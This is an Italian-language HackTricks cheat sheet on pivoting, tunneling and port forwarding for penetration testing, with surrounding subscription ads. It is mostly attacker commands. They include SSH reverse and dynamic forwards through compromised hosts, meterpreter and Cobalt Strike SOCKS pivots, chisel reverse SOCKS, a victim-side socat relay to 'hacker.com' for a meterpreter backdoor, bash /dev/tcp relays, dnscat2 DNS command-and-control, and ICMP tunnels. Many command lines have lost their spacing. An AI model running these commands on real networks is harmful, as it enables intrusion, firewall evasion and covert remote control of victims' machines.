Lavori in una azienda di sicurezza informatica? Vuoi vedere la tua azienda pubblicizzata su HackTricks? o vuoi avere accesso all'ultima versione del PEASS o scaricare HackTricks in PDF? Controlla i PIANI DI ABBONAMENTO!
ICMP e scansioni SYN non possono essere tunnelate attraverso proxy socks, quindi dobbiamo disabilitare la scoperta del ping (-Pn) e specificare scansioni TCP (-sT) affinché funzioni.
Bash
Host -> Salto -> InternoA -> InternoB
# On the jump server connect the port 3333 to the 5985mknodbackpipep;nc-lvnp59850<backpipe|nc-lvnp33331>backpipe# On InternalA accessible from Jump and can access InternalB## Expose port 3333 and connect it to the winrm port of InternalBexec3<>/dev/tcp/internalB/5985exec4<>/dev/tcp/Jump/3333cat<&3>&4&cat<&4>&3&# From the host, you can now access InternalB from the Jump serverevil-winrm-uusername-iJump
SSH
Connessione grafica SSH (X)
ssh-Y-C<user>@<ip>#-Y is less secure but faster than -X
Porta Locale2Locale
Aprire una nuova porta nel server SSH --> Altra porta
ssh-R0.0.0.0:10521:127.0.0.1:1521user@10.0.0.1#Local port 1521 accessible in port 10521 from everywhere
ssh-R0.0.0.0:10521:10.0.0.1:1521user@10.0.0.1#Remote port 1521 accessible in port 10521 from everywhere
Porta2Porta
Porta locale --> Host compromesso (SSH) --> Terza_scatola:Porta
ssh -i ssh_key <user>@<ip_compromised> -L <attacker_port>:<ip_victim>:<remote_port> [-p <ssh_port>] [-N -f] #This way the terminal is still in your host
#Examplesudossh-L631:<ip_victim>:631-N-f-l<username><ip_compromised>
Port2hostnet (proxychains)
Porta locale --> Host compromesso (SSH) --> Qualsiasi luogo
ssh -f -N -D <attacker_port> <username>@<ip_compromised> #All sent to local port will exit through the compromised server (use as proxy)
Inoltro Porta Inverso
Questo è utile per ottenere shell inverse da host interni attraverso una DMZ al tuo host:
ssh-idmz_key-R<dmz_internal_ip>:443:0.0.0.0:7000root@10.129.203.111-vN# Now you can send a rev to dmz_internal_ip:443 and caputure it in localhost:7000# Note that port 443 must be open# Also, remmeber to edit the /etc/ssh/sshd_config file on Ubuntu systems# and change the line "GatewayPorts no" to "GatewayPorts yes"# to be able to make ssh listen in non internal interfaces in the victim (443 in this case)
VPN-Tunnel
È necessario avere i permessi di root su entrambi i dispositivi (poiché si andranno a creare nuove interfacce) e la configurazione di sshd deve consentire l'accesso come root:
PermitRootLogin yesPermitTunnel yes
sshroot@server-wany:any#This will create Tun interfaces in both devicesipaddradd1.1.1.2/32peer1.1.1.1devtun0#Client side VPN IPifconfigtun0up#Activate the client side network interfaceipaddradd1.1.1.1/32peer1.1.1.2devtun0#Server side VPN IPifconfigtun0up#Activate the server side network interface
Porta locale --> Host compromesso (sessione attiva) --> Terza_scatola:Porta
# Inside a meterpreter sessionportfwdadd-l<attacker_port>-p<Remote_port>-r<Remote_host>
SOCKS
SOCKS (Socket Secure) è un protocollo di rete che permette il tunneling di connessioni di rete attraverso un firewall di rete. SOCKS funziona come un proxy server che inoltra il traffico di rete tra il client e il server attraverso un tunnel sicuro.
background#meterpretersessionrouteadd<IP_victim><Netmask><Session># (ex: route add 10.10.10.14 255.255.255.0 8)useauxiliary/server/socks_proxyrun#Proxy port 1080 by defaultecho"socks4 127.0.0.1 1080">/etc/proxychains.conf#Proxychains
Un altro modo:
background#meterpreter sessionusepost/multi/manage/autoroutesetSESSION<session_n>setSUBNET<New_net_ip>#Ex: set SUBNET 10.1.13.0setNETMASK<Netmask>runuseauxiliary/server/socks_proxysetVERSION4arun#Proxy port 1080 by defaultecho"socks4 127.0.0.1 1080">/etc/proxychains.conf#Proxychains
Cobalt Strike
Proxy SOCKS
Aprire una porta nel teamserver in ascolto su tutte le interfacce che possono essere utilizzate per instradare il traffico attraverso il beacon.
beacon>socks1080[+] started SOCKS4a server on: 1080# Set port 1080 as proxy server in proxychains.confproxychainsnmap-n-Pn-sT-p445,3389,598510.10.17.25
rPort2Port
In questo caso, la porta è aperta nell'host beacon, non nel Server del Team e il traffico viene inviato al Server del Team e da lì all'host:porta indicato.
In questo caso, la porta viene aperta nell'host del beacon, non nel Team Server e il traffico viene inviato al client Cobalt Strike (non al Team Server) e da lì all'host:porta indicato.
Puoi scaricarlo dalla pagina dei rilasci di https://github.com/jpillora/chisel
È necessario utilizzare la stessa versione per client e server
socks
./chiselserver-p8080--reverse#Server -- Attacker./chisel-x64.execlient10.10.14.3:8080R:socks#Client -- Victim#And now you can use proxychains with port 1080 (default)./chiselserver-v-p8080--socks5#Server -- Victim (needs to have port 8080 exposed)./chiselclient-v10.10.10.10:8080socks#Attacker
#Create meterpreter backdoor to port 3333 and start msfconsole listener in that portattacker>socatOPENSSL-LISTEN:443,cert=server.pem,cafile=client.crt,reuseaddr,fork,verify=1TCP:127.0.0.1:3333
victim> socat.exe TCP-LISTEN:2222 OPENSSL,verify=1,cert=client.pem,cafile=server.crt,connect-timeout=5|TCP:hacker.com:443,connect-timeout=5
#Execute the meterpreter
Puoi bypassare un proxy non autenticato eseguendo questa riga invece dell'ultima nella console della vittima:
Creare certificati su entrambi i lati: Client e Server
# Execute these commands on both sidesFILENAME=socatsslopensslgenrsa-out $FILENAME.key1024opensslreq-new-key $FILENAME.key-x509-days3653-out $FILENAME.crtcat $FILENAME.key $FILENAME.crt>$FILENAME.pemchmod600 $FILENAME.key $FILENAME.pem
Collega la porta SSH locale (22) alla porta 443 dell'host dell'attaccante
attacker> sudo socat TCP4-LISTEN:443,reuseaddr,fork TCP4-LISTEN:2222,reuseaddr #Redirect port 2222 to port 443 in localhost
victim> while true; do socat TCP4:<attacker>:443 TCP4:127.0.0.1:22 ; done # Establish connection with the port 443 of the attacker and everything that comes from here is redirected to port 22
attacker>sshlocalhost-p2222-lwww-data-ivulnerable#Connects to the ssh of the victim
Plink.exe
È come una versione console di PuTTY (le opzioni sono molto simili a un client ssh).
Poiché questo binario verrà eseguito nella vittima ed è un client ssh, dobbiamo aprire il nostro servizio ssh e la porta in modo da poter avere una connessione inversa. Quindi, per inoltrare solo la porta accessibile localmente a una porta nella nostra macchina:
echo y | plink.exe -l <Our_valid_username> -pw <valid_password> [-p <port>] -R <port_ in_our_host>:<next_ip>:<final_port> <your_ip>
echoy|plink.exe-lroot-pwpassword [-p 2222]-R9090:127.0.0.1:909010.11.0.41#Local port 9090 to out port 9090
Windows netsh
Port2Port
È necessario essere un amministratore locale (per qualsiasi porta)
netshinterfaceportproxyaddv4tov4listenaddress=listenport=connectaddress=connectport=protocol=tcp# Example:netshinterfaceportproxyaddv4tov4listenaddress=0.0.0.0listenport=4444connectaddress=10.10.10.10connectport=4444# Check the port forward was created:netshinterfaceportproxyshowv4tov4# Delete port forwardnetshinterfaceportproxydeletev4tov4listenaddress=0.0.0.0listenport=4444
SocksOverRDP & Proxifier
È necessario avere accesso RDP sul sistema.
Scarica:
SocksOverRDP x64 Binaries - Questo strumento utilizza i Dynamic Virtual Channels (DVC) dalla funzionalità di servizio Desktop remoto di Windows. DVC è responsabile del tunneling dei pacchetti sulla connessione RDP.
Nel computer client carica SocksOverRDP-Plugin.dll in questo modo:
# Load SocksOverRDP.dll using regsvr32.exeC:\SocksOverRDP-x64>regsvr32.exeSocksOverRDP-Plugin.dll
Ora possiamo connetterci alla vittima tramite RDP utilizzando mstsc.exe, e dovremmo ricevere un prompt che indica che il plugin SocksOverRDP è abilitato, e che sarà in ascolto su 127.0.0.1:1080.
Connettiti tramite RDP e carica ed esegui nella macchina della vittima il binario SocksOverRDP-Server.exe:
C:\SocksOverRDP-x64> SocksOverRDP-Server.exe
Ora, conferma sulla tua macchina (attaccante) che la porta 1080 è in ascolto:
netstat -antb | findstr 1080
Ora puoi utilizzare Proxifierper instradare il traffico attraverso quella porta.
Proxify Applicazioni GUI di Windows
Puoi fare in modo che le applicazioni GUI di Windows navighino attraverso un proxy utilizzando Proxifier.
In Profilo -> Server Proxy aggiungi l IP e la porta del server SOCKS.
In Profilo -> Regole di Proxificazione aggiungi il nome del programma da proxificare e le connessioni agli IP che desideri proxificare.
Bypass del proxy NTLM
Lo strumento precedentemente menzionato: RpivotOpenVPN può anche evitarlo, impostando queste opzioni nel file di configurazione:
Autentica contro un proxy e associa localmente una porta che viene inoltrata al servizio esterno che specificate. Successivamente, potete utilizzare lo strumento che preferite attraverso questa porta.
Per esempio, inoltra la porta 443
Username Alice
Password P@ssw0rd
Domain CONTOSO.COM
Proxy 10.0.0.10:8080
Tunnel 2222:<attackers_machine>:443
Ora, se imposti ad esempio nel sistema vittima il servizio SSH per ascoltare sulla porta 443. Puoi connetterti ad esso attraverso la porta 2222 dell'attaccante.
Potresti anche utilizzare un meterpreter che si connette a localhost:443 e l'attaccante è in ascolto sulla porta 2222.
Stabilisce un canale C&C tramite DNS. Non richiede privilegi di root.
attacker>ruby./dnscat2.rbtunneldomain.comvictim>./dnscat2tunneldomain.com# If using it in an internal network for a CTF:attacker>rubydnscat2.rb--dnshost=10.10.10.10,port=53,domain=mydomain.local--no-cachevictim>./dnscat2--dnshost=10.10.10.10,port=5353
In PowerShell
Puoi utilizzare dnscat2-powershell per eseguire un client dnscat2 in powershell:
session-i<sessions_id>listen [lhost:]lport rhost:rport #Ex: listen 127.0.0.1:8080 10.0.0.20:80, this bind 8080port in attacker host
Cambiare il DNS di proxychains
Proxychains intercetta la chiamata libc gethostbyname e instrada la richiesta DNS tcp attraverso il proxy socks. Per default, il server DNS che utilizza proxychains è 4.2.2.2 (hardcoded). Per cambiarlo, modifica il file: /usr/lib/proxychains3/proxyresolv e cambia l'IP. Se ti trovi in un ambiente Windows puoi impostare l'IP del domain controller.
È necessario avere i permessi di root in entrambi i sistemi per creare adattatori tun e instradare i dati tra di essi utilizzando richieste di eco ICMP.
./hans-v-f-s1.1.1.1-pP@ssw0rd#Start listening (1.1.1.1 is IP of the new vpn connection)./hans-f-c<server_ip>-pP@ssw0rd-vping1.1.1.100#After a successful connection, the victim will be in the 1.1.1.100
# Generate itsudo./autogen.sh# Server -- victim (needs to be able to receive ICMP)sudoptunnel-ng# Client - Attackersudoptunnel-ng-p<server_ip>-l<listen_port>-r<dest_ip>-R<dest_port># Try to connect with SSH through ICMP tunnelssh-p2222-luser127.0.0.1# Create a socks proxy through the SSH connection through the ICMP tunnelssh-D9050-p2222-luser127.0.0.1
ngrok
ngrok è uno strumento per esporre soluzioni su Internet in una sola riga di comando.Gli URI di esposizione sono simili a:UID.ngrok.io
Installazione
Crea un account: https://ngrok.com/signup
Download del client:
tar xvzf ~/Downloads/ngrok-v3-stable-linux-amd64.tgz -C /usr/local/bin
chmod a+x ./ngrok
# Init configuration, with your token
./ngrok config edit
Lavori in una azienda di sicurezza informatica? Vuoi vedere la tua azienda pubblicizzata in HackTricks? o vuoi avere accesso all'ultima versione del PEASS o scaricare HackTricks in PDF? Controlla i PIANI DI ABBONAMENTO!